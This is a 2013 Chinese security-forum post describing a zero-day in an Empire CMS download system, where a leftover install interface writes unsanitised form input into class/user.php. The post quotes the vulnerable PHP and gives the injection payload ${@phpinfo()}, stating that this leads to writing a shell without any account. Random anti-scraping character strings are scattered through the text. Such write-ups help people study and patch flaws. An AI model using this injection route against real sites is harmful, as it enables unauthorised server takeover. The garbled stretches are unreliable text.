找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2409|回复: 0
打印 上一主题 下一主题

帝国万能接口漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们: D0 U+ G. E6 c3 E: f9 }( }. l
2 _! e( p/ M& G5 F8 O1 w

; r. a- b9 j/ G6 k3 }% F
这是帝国的一套下载系统 如图
  ^9 n. L5 R; Q( Z  O. jps(不需要任何账户和密码,直接写shell)


% @# M9 T9 M5 j* [! f

由于很多站是由于下载要整合discuz 等等一些论坛....
- L. G7 l$ ?* x8 n( E


3 \( B1 y' ]' {" {

而帝国他又有一个万能接口,如图

2 x2 R* R7 }2 F" h) [* N/ m# j
, c% S! j* O! i. t! c! ~( H

+ ?  O+ o% ~& i

而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码. g" f* Z" l, G5 I! d( ^
% j7 T' @. ^8 [( @  X( h6 Z" {' a
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig

1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}

复制代码

他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪5 u: e0 ?2 s+ [2 M9 z
! M3 _3 `, `+ @
在data/fun.php中的15行
7 w' o! ^% ^# R$ d) I8 @2 b
& g3 K8 c# @5 Z; n我们可以看到这个函数

1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {; q+ o8 f  L( Q
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);

复制代码

.....//省略若干& x0 h- b! H# `- F3 ~/ {6 z

2 D+ g8 ]0 A: l( Z这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);  p$ X  `5 O7 m( M

" N! L/ n3 F+ D3 A/ {: J他将传进来的变量进行了切割,然后赋给了$filetext
2 m# i2 D# w" j' ^% k
% }2 ?: r' u5 L" w然后看下面

1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
6. }
7. @fputs($fp,$filetext);

复制代码

打开了一个class/user.php文件,然后将$filetext写入了
. t- s/ N( t& z9 `* B6 i6 i3 s1 L6 N$ |
我们看看写入的结果,随便填一个

2 u, i5 {8 L8 Q  @: U7 E

, u: J3 W$ Q& @  Z& q* M
5 ]4 ~- f. Q! b1 a3 ?: x
( _" |6 Q6 T9 U! B
$ B& Q& U" }# ^0 Q# Q' {+ ?, o
# ]6 i' \/ Y9 h: q9 r2 k1 A

, P- I+ t6 P# h3 x* S
6 x9 v( I" d+ ^9 [* Y& c
& E( [7 {- {: c% Y- Q, u
, U) c' ~: ^3 X' K

# \; Q) y" }' ]( z( j- {
/ ^) V) b! B2 c; o* @' z* |
2 ~/ X$ T, z# |+ _0 q! Q0 U1 W% T% t7 V6 H' N5 w9 Z% u" `" _
+ d7 }0 C; w, l! |2 [4 `
! e7 ?5 A' r$ p
) Z1 g5 G( K& X! M$ i% N

% [' W: X0 E( G7 K! |) t6 p
" ?& _  Z6 c  p- `1 g- O3 C* X# F7 i& U/ Y" Q+ K* k  o

2 o& [# {$ ~4 L' X! d9 r+ a, V4 [2 }1 b8 w* g/ V6 }

所以我们淫荡点,写个${@phpinfo()}试试


3 I7 U* m1 E7 c! X

然后访问以下class/user.php这个文件
/ v) \4 D- g- R' W7 ~9 l, m4 d3 N- f日了吧


- k9 B# ^( i- n# Q( z( i  r# _

# ^! T. h  E6 H. G/ J1 t
, w" D, e) ?8 V6 Z
6 O) D5 ?* L* p8 K1 j
' Z- V# [/ w" h6 c* G

( Z: W" p% A7 @" [6 m+ v& A1 [8 u' U

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表